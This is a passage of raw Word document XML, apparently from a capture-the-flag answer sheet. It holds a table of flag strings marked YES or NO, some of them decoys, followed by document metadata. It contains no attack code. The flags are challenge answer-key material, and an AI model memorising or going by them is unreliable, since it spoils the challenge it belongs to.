              <w:t>FLAG{</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00496AB3">
              <w:t>Nice_try_Kiddo_Now_try_next</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00496AB3">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="478981D6" w14:textId="306E4108" w:rsidR="00496AB3" w:rsidRPr="00496AB3" w:rsidRDefault="00496AB3" w:rsidP="00496AB3">
            <w:r>
              <w:t>YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496AB3" w:rsidRPr="00496AB3" w14:paraId="6A103EF5" w14:textId="0146CC42" w:rsidTr="00496AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1902945F" w14:textId="77777777" w:rsidR="00496AB3" w:rsidRPr="00496AB3" w:rsidRDefault="00496AB3" w:rsidP="00496AB3">
            <w:r w:rsidRPr="00496AB3">
              <w:t>FLAG{Trust_me_its_false_3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1416A777" w14:textId="6FBA5E49" w:rsidR="00496AB3" w:rsidRPr="00496AB3" w:rsidRDefault="00496AB3" w:rsidP="00496AB3">
            <w:r>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00496AB3" w:rsidRPr="00496AB3" w14:paraId="0ABC70C0" w14:textId="44234F81" w:rsidTr="00496AB3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5720" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E0A3047" w14:textId="77777777" w:rsidR="00496AB3" w:rsidRPr="00496AB3" w:rsidRDefault="00496AB3" w:rsidP="00496AB3">
            <w:r w:rsidRPr="00496AB3">
              <w:t>FLAG{Trust_me_its_ture_3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3634" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19ADF3F3" w14:textId="56952E3F" w:rsidR="00496AB3" w:rsidRPr="00496AB3" w:rsidRDefault="00496AB3" w:rsidP="00496AB3">
            <w:r>
              <w:t>NO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="123C55E8" w14:textId="0F4D9F06" w:rsidR="00496AB3" w:rsidRDefault="00496AB3">
      <w:r w:rsidRPr="00496AB3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FDA5D8F" wp14:editId="7628CB69">
            <wp:extent cx="5943600" cy="3341370"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="87786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619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992"/>
    <w:rsid w:val="00040992"/>
    <w:rsid w:val="00121D3D"/>
    <w:rsid w:val="002B23A0"/>
    <w:rsid w:val="0035023A"/>
    <w:rsid w:val="00365D7A"/>
    <w:rsid w:val="00453893"/>
    <w:rsid w:val="00455D3B"/>
    <w:rsid w:val="00460CC4"/>
    <w:rsid w:val="00496AB3"/>
    <w:rsid w:val="004A1F6F"/>
    <w:rsid w:val="00587E9F"/>
    <w:rsid w:val="005C338D"/>
    <w:rsid w:val="0063785B"/>
    <w:rsid w:val="006A49F4"/>
    <w:rsid w:val="009A3845"/>
    <w:rsid w:val="00A17C28"/>
    <w:rsid w:val="00A5156B"/>
    <w:rsid w:val="00A55C7C"/>
    <w:rsid w:val="00B22E4E"/>
    <w:rsid w:val="00B55082"/>
    <w:rsid w:val="00BF6FA1"/>
    <w:rsid w:val="00C242B1"/>
    <w:rsid w:val="00C3324B"/>
    <w:rsid w:val="00C93184"/>
    <w:rsid w:val="00D71DC9"/>
    <w:rsid w:val="00E06A21"/>
    <w:rsid w:val="00FE1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F0D27"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E0306C01-2806-49C5-A47D-920DFBADC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0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0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99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5023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5023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5023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0AB88C-E500-4965-A6C8-F69756277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Tauha Imran</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tauha Imran</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-24T04:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-24T05:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>